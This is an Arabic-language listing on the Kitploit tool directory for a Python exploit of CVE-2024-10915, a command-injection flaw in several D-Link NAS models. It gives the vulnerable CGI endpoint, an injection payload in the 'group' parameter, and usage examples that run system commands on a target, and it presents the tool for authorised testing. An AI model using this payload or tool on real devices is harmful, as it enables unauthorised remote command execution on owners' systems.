Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10915 — أداة استغلال بلغة Python لثغرة CVE-2024-10915، وهي ثغرة حقن أوامر في أجهزة D-Link NAS. تنفذ أوامر نظام عشوائية عبر نقطة النهاية /cgi-bin/account_mgr.cgi لاختبار الأمان المصرح به. | Kitploit
أدوات/GitHubGitHub/r0otk3r/cve-2024-10915
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

أداة استغلال بلغة Python لثغرة CVE-2024-10915، وهي ثغرة حقن أوامر في أجهزة D-Link NAS. تنفذ أوامر نظام عشوائية عبر نقطة النهاية /cgi-bin/account_mgr.cgi لاختبار الأمان المصرح به.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10915 - استغلال حقن الأوامر في أجهزة D-Link NAS

يستهدف هذا الاستغلال المكتوب بلغة بايثون ثغرة حقن أوامر في عدة منتجات D-Link NAS عبر نقطة النهاية /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. تسمح الثغرة للمهاجمين غير المصادق عليهم بتنفيذ أوامر نظام عشوائية على الجهاز المتأثر.

الوصف

تؤثر CVE-2024-10915 على عدة موديلات D-Link NAS. يمكن للمهاجم حقن أوامر من خلال معلمة group في أمر cgi_user_add، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

المنتجات المتأثرة

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
نقطة النهاية المعرضة للخطر: `/cgi-bin/account_mgr.cgi?cmd=cgi_user_add`

مثال:

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

المتطلبات

  • Python 3.x

  • مكتبة requests

تثبيت التبعيات المطلوبة:

root@kitploit:~
pip3 install requests

الاستخدام

root@kitploit:~
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

الخيارات:

المثال 1

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

المثال 2

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

المثال 3

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ إخلاء المسؤولية

هذا المشروع مخصص للأغراض التعليمية والاختبارات المصرح بها فقط. لا تستخدم هذه الأداة على شبكات أو أنظمة ليس لديك إذن صريح لاختبارها. المؤلفون لا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج.


القنوات الرسمية

  • YouTube @rootctf
  • X @r0otk3r
تنزيل الأداة
الخيارالوصف
-u / --urlعنوان URL الأساسي للهدف (مثل http://192.168.1.100)
-c / --commandالأمر المراد تنفيذه على الجهاز (الافتراضي: id)
-p / --proxyاستخدام وكيل HTTP (مثل http://127.0.0.1:8080)
-o / --outputحفظ استجابة HTTP في ملف
-l / --listعرض منتجات D-Link NAS المتأثرة